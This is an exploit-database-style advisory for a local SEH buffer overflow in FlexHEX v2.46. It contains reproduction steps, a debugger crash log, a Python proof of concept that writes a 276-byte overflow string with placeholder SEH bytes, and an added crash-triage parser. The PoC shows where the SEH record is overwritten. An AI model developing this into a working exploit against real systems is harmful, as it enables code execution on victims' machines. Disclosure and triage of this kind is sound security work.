# Exploit Title: FlexHEX v2.46 - Denial of Service (PoC) and SEH overwritten Crash PoC
# Discovery by: Rafael Pedrero
# Discovery Date: 2018-12-20
# Vendor Homepage: http://www.flexhex.com/order/?r1=iNetShortcut&r2=fhx1
# Software Link : http://www.flexhex.com/order/?r1=iNetShortcut&r2=fhx1
# Tested Version: 2.46
# Tested on: Windows XP SP3
# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow

# Steps to Produce the Crash:
# 1.- Run FlexHEX.exe
# 2.- Go to Menu "Stream" - "New Stream" and copy the content of FlexHEX_SEH_Crash.txt to the clipboard
# 3.- Paste the content into the field: 'Stream Name:'
# 4.- Click the 'OK' button and you will see a crash.

'''
Log data, item 21
 Address=0BADF00D
 Message=SEH record (nseh field) at 0x0012dde8 overwritten with unicode pattern : 0x006a0041 (offset 276), followed by 20 bytes of cyclic data after the handler

SEH chain of main thread
Address    SE handler
0012DDFC   FlexHEX.00420042
00420042   8BC13B2C 4E8B3C46   *** CORRUPT ENTRY ***

EAX 00410041 FlexHEX.00410041
ECX 00000000
EDX 00000000
EBX 0012FA18
ESP 0012DE3C UNICODE "AAAAAAAAAABBBB"
EBP 00410041 FlexHEX.00410041
ESI 0012DE78
EDI 0012E69C
EIP 00410041 FlexHEX.00410041
C 0  ES 0023 32bit 0(FFFFFFFF)
P 0  CS 001B 32bit 0(FFFFFFFF)
A 1  SS 0023 32bit 0(FFFFFFFF)
Z 0  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFDF000(FFF)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00010212 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty
ST1 empty
ST2 empty
ST3 empty
ST4 empty
ST5 empty
ST6 empty
ST7 empty
               3 2 1 0      E S P U O Z D I
FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1
'''

#!/usr/bin/env python
# Writes the FlexHEX_SEH_Crash.txt file that step 2 above pastes into the 'Stream Name:' field.
nseh = "BB"            # bytes that land on the next-SEH pointer
seh = "BB"             # bytes that land on the SEH handler pointer
junk = "\x41" * 276    # 276 'A' characters: filler up to the nseh field (offset 276 in the log above)
crash = junk + nseh + seh

with open("FlexHEX_SEH_Crash.txt", "w") as f:
    f.write(crash)
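An added crash-triage helper, not part of the original advisory, that reads the debugger output quoted above and reports which registers and SEH fields ended up holding the pasted wide-string input (useful when rating how serious a reported crash is). The log excerpt is constructed from the lines quoted above; the function names are my own.

```python
import re

# Constructed excerpt of the debugger output quoted above (mona SEH message,
# one SEH-chain line, and a few registers); sample input, not a new capture.
CRASH_LOG = """
Message=SEH record (nseh field) at 0x0012dde8 overwritten with unicode pattern : 0x006a0041 (offset 276), followed by 20 bytes of cyclic data after the handler
0012DDFC FlexHEX.00420042 00420042 8BC13B2C 4E8B3C46 *** CORRUPT ENTRY ***
EAX 00410041 FlexHEX.00410041
ECX 00000000
ESP 0012DE3C UNICODE "AAAAAAAAAABBBB"
EBP 00410041 FlexHEX.00410041
EIP 00410041 FlexHEX.00410041
"""


def decode_utf16_dword(value):
    """Return the text a 32-bit value spells when read as two UTF-16LE code
    units (e.g. 0x00410041 -> "AA"), or None if it is not printable ASCII.
    A register that decodes this way was filled from the wide-string input."""
    try:
        text = value.to_bytes(4, "little").decode("utf-16-le")
    except UnicodeDecodeError:  # unpaired surrogate, e.g. a genuine stack address
        return None
    return text if text.isascii() and text.isprintable() else None


def triage_registers(log):
    """Map each general register in the dump to the input text it contains."""
    hits = {}
    for name, hexval in re.findall(r"^(E[A-Z]{2}) ([0-9A-F]{8})", log, re.M):
        text = decode_utf16_dword(int(hexval, 16))
        if text is not None:
            hits[name] = text
    return hits


def seh_overwrite_offset(log):
    """Return (value written over nseh, byte offset) from mona's message, or None."""
    m = re.search(r"pattern : 0x([0-9a-fA-F]{8}) \(offset (\d+)\)", log)
    return (int(m.group(1), 16), int(m.group(2))) if m else None


def corrupt_seh_entries(log):
    """Addresses of SEH records the debugger flagged as corrupt."""
    return re.findall(r"^([0-9A-F]{8}) .*\*\*\* CORRUPT ENTRY \*\*\*", log, re.M)


if __name__ == "__main__":
    print("registers holding input bytes:", triage_registers(CRASH_LOG))
    print("nseh overwrite (value, offset):", seh_overwrite_offset(CRASH_LOG))
    print("corrupt SEH records:", corrupt_seh_entries(CRASH_LOG))
```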